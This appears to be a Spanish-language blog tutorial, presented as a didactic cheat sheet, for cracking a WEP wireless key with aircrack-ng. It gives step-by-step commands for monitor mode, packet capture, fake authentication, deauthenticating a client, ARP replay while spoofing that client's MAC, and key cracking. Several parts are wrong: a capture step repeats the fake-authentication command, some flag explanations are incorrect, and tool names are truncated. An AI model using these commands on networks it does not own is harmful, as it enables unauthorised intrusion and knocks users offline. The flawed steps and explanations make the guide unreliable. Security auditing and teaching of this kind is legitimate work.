No es un secreto el método ni las herramientas para recuperar las contraseñas de algún punto de acceso . El presente es un repaso sobre los comandos a ejecutar en una auditoría wireless ya que a pesar de que existen scripts diseñados para facilitar esta tarea eso implica que el conocimiento adquirido sea pobre sin embargo esta guía tampoco explica minuciosamente la forma en que se resuelven los retos en cada auditoría ni lo que implica cada paso. El objetivo de esta entrada es para fines didácticos y más bien como chuleta para recordar la forma manual en que se realiza este proceso. Todos los comentarios relacionados con el uso malintencionado de este tutorial serán eliminados.

Notas:

  • Se da por hecho que tienes los drivers parcheados, listo para la inyección de paquetes.
  • El paquete utilizado es -ng desde los repositorios oficiales.
  • 55:55:55:55:55:55 es el MAC del punto de acceso objetivo.
  • 00:11:22:33:44:55 es el MAC del cliente conectado al punto de acceso objetivo.

Seleccionamos Objetivos

Abrimos una en nuestra distribución favorita y comenzamos:

1. Ponemos en modo monitor a nuestra tarjeta inalámbrica.

sudo airmon-ng start <interfaz> <canal>

2. Comenzamos la captura de paquetes.
sudo airodump-ng --channel <canal> --write <nombre_dearchivo> <interfaz>

O podemos probar con este otro para que busque en un solo punto de acceso.

sudo aireplay-ng -1 0 -e <essid_objetivo> -a 55:55:55:55:55:55 -h MY:MA:CA:DD:RE:SS <interfaz>

Donde la opción –channel sirve para elegir de forma optativa el canal en el cual buscar, la opción –bssid para especificar la MAC de punto de acceso objetivo y –writer para especificar un nombre al archivo donde se guaradarán los paquetes.

Verificando el filtrado MAC

3. Antes de continuar debemos verificar si el punto de acceso realiza filtrado MAC en sus clientes. Usamos este comando:

sudo aireplay-ng -1 0 -e <essid_objetivo> -a 55:55:55:55:55:55 -h MY:MA:CA:DD:RE:SS <interfaz>

Donde:

  • -1 Le dice que NO intente desautentificar clientes.
  • -e Es el nombre de la red objetivo.
  • -a Es la MAC del AP objetivo.
  • -h Es la MAC que tu quieras.

Si el resultado luce así:

03:22:32 Sending Authentication Request
03:22:32 Authentication successful
03:22:32 Sending Association Request
03:22:32 Association successful :-)

Significa que el filtrado esta apagado y podemos continuar con el tutorial, de otra forma salta a la sección Con Filtrado MAC.

Sin Filtrado MAC

4. Reinyección de paquetes.

sudo aireplay-ng -3 -b 55:55:55:55:55:55 -h MY:MA:CA:DD:RE:SS <interfaZ>

Ahora solo debemos ser pacientes hasta recibir un paquete ARP para poder usar una vez recibido el numero de paquetes recibidos se elevara muy rapido, en este punto como el filtrado esta desactivado podemos usar cualquier MAC. Podemos pasar a descifrar la clave.

Con Filtrado MAC

4. Obligamos a desautentificar al cliente que esta en el AP objetivo.

sudo aireplay-ng -0 5 -a 55:55:55:55:55:55 -c 00:11:22:33:44:55 <interface>
Donde:

  • -0 Indica el numero de intentos.
  • -a El MAC del AP objetivo.
  • -c La dirección MAC del cliente.

Para la Re-Inyección se procede de la misma forma solo que ahora nos haremos pasar por el cliente.

sudo aireplay-ng -3 -b 55:55:55:55:55:55 -h 00:11:22:33:44:55 <interfaz>

Como había mencionado… Ahora solo debemos ser pacientes hasta recibir un paquete ARP para poder usar una vez recibido el numero de paquetes recibidos se elevara muy rapido, en este punto como el filtrado esta desactivado podemos usar cualquier MAC. Podemos pasar a descifrar la clave.

Obtenemos la clave

Para llegar a este punto necesitas:

a) Con Aircrack-NG

  • Por lo menos 250’000 paquetes para una clave de 64bits
  • Por lo menos 1’500’000 paquetes para una clave de 128bits.

b) Con Aircrack-PTW

  • Alrededor de 20’000 paquetes para una clave de 64bits.
  • Alrededor de 85’000 paquetes para una clave de 128bits.

Para usar Aircrack-NG tecleamos:
sudo aircrack-ng <nombre_dearchivo>.cap
Y para usar Aircrack-PTW tecleamos:

./aircrack-ptw <nombre_dearchivo>.cap

Finalmente conseguimos verificar la fortaleza de nuestra red Inalámbrica.